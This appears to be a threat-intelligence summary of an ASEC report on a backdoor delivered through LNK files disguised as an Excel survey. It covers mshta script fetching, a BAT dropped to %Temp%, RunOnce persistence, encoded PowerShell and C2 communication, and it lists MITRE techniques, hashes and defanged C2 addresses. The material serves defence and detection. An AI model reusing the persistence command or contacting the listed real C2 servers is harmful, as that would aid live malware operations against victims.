ASEC confirms a backdoor that was previously distributed as CHM is now spread via LNK files, using mshta to fetch and execute remote scripts and to receive commands from a threat actor’s server. The LNK payload is delivered with other malware in compressed files, masquerades as a legitimate Excel document, and persists via RunOnce registry modifications while using PowerShell to run additional scripts.
Keypoints
- The backdoor shift from CHM to LNK distribution is tied to mshta-based script execution and remote command retrieval.
- The malicious LNK is uploaded on a regular website, paired with other malware inside a ZIP file.
- The LNK file creates and executes a normal Excel document (Status Survey Table.xlsx) alongside a malicious BAT script in %Temp% via PowerShell.
- Persistence is established by adding a RunOnce registry entry (BackupUserProfiles) to auto-run the BAT file.
- The BAT drops additional payloads and executes a hex-encoded PowerShell command that talks to the attacker’s C2 servers.
- C2 infrastructure involves HTTP endpoints (e.g., 75.119.136.207 and cafe24.com) for receiving commands and downloading scripts.
MITRE Techniques
- [T1059.005] Mshta – The LNK executes additional scripts located at a specific URL through the mshta process. Quote: “…executes additional scripts located at a specific URL through the mshta process…”
- [T1059.001] PowerShell – The BAT file triggers execution of a malicious BAT and then PowerShell commands. Quote: “…PowerShell commands.”
- [T1547.001] Registry Run Keys/Startup Folder – The BAT is registered to RunOnce to ensure persistence. Quote: “Registry path: HKCU SoftwareMicrosoftWindowsCurrentVersionRunOnce” and “Value: C:WindowsSysWOW64cmd.exe /c %appdata%MicrosoftProtectUserProfileSafeBackup.bat”
- [T1112] Modify Registry – The malware registers in the registry to ensure continuous execution of the BAT file. Quote: “it is registered in the following registry to ensure continuous execution of the BAT file.”
- [T1027] Obfuscated/Encoded Files and Information – The PowerShell command is obfuscated/encoded (e.g., Base64). Quote: “PowerShell command obfuscated in Base64 as shown below.”
- [T1071.001] Web Protocols – The attacker communicates via HTTP(S) endpoints for C2 (receives commands and transmits results). Quote: “Receives commands from the threat actor” and “Transmits command execution results”
- [T1036] Masquerading – The dropped Excel document impersonates a Korean public organization. Quote: “Status Survey Table.xlsx appears as a normal Excel document and impersonates a Korean public organization.”
- [T1105] Ingress Tool Transfer – The malware downloads and executes additional files through PowerShell. Quote: “Downloads additional files in the received path.”
Indicators of Compromise
- [Hash] File hash – 0eb8db3cbde470407f942fd63afe42b8, 2d444b6f72c8327d1d155faa2cca7fd7, and 1 more hash
- [IP] C2 IP address – 75.119.136.207
- [URL] C2/config endpoints – hxxp://75.119.136[.]207/config/bases/config.php and hxxp://bian0151.cafe24[.]com/admin/board/1.html
Read more: https://asec.ahnlab.com/en/56756/